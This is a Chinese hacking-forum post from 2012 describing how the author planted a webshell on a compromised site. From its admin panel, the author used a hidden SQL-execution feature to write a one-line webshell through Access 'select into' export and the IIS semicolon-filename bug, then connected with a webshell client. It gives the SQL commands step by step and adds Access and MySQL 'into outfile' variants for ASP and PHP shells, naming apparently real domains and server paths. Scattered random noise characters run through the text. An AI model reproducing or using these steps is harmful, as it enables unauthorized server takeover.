好不容易进了后台,发现啥上传啊。备份啊多木有。
: V1 i+ Q! ]& K4 t8 d, wwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的: A8 L. ?+ I; y% I" j( I$ y
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了," i/ G( W, ^% c& |0 ?/ y
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
, l, w4 |2 {9 v" _; C. t1.create table cmd (a varchar(50))
& b1 s& \1 m! o* L0 l4 C% a9 ?/ C2.insert into cmd (a) values (‘‘)
; t* P& v2 c1 P3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
2 v! U: Y2 E0 g(把表cmd的内容导出为物理路径的一个EXCEL文件)
# g: o/ q7 i0 \; P, B5 n5 g! L+ @4.drop table cmd9 Z6 \# ~1 T7 A3 S% U
利用IIS的BUG成功拿到了WEBSHELL。 |/ x% N! s# T2 ?" a7 g5 d
; Y. X# t# T6 S( i" A- x直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话% G# g( i; w( m$ v3 w8 k. N
" O! M. G. H. f7 o8 X3 Y3 c; @
SQL语句意思解释:
, w8 X+ i1 l; d; p6 Z Q5 T l& z 第一句$ s7 r" P) |1 E+ F1 \ V
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为501 T2 R( U9 ?* t5 l: Z3 o' S _* Y
4 x1 u/ G: K6 |
第二句
9 p8 t4 {0 Z6 @4 V. \2 g! X 在表cmd的a字段插入一句话木马
8 M* \3 R( g1 _% r4 ]# L6 X1 [! W 第三句7 H& E$ H! a9 w! f$ M6 O; C* v- m9 V
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件& @) p( ?- R5 l V# g
4 w. }# x7 D1 p- p0 k) s
第四句; x, h; V8 ^. U* o4 W7 p4 }$ X; [
删除建立的cmd表) C( j( Q% G' k8 ?7 }
% E$ K: f& j! b" a" T* K 以下内容为测试:3 {# K9 ?0 E d2 R( r
Access利用后台SQL执行命令功能导出WebShell:
E! D1 B& t6 O! k' _& K" d5 ^ 这个更简单:5 ~$ t& }9 @; C' z- |! U3 D9 Z
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
% o5 B' @* K5 F1 d X 或者0 Q7 G$ U2 \" Z% W( }4 m! Q9 ~
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
* T6 N5 A$ A1 H( R' o( A
, W( L N0 D/ x( {- U 后台有执行SQL语句功能(vote为已知表段)
7 }" ]. h+ p% f* h( M3 P" y2 o 希望对大家有所帮助拿shell的又一个思路
" g/ L3 H' v2 m+ \$ U |
发表于 2012-9-13 17:53:58
收藏
支持
反对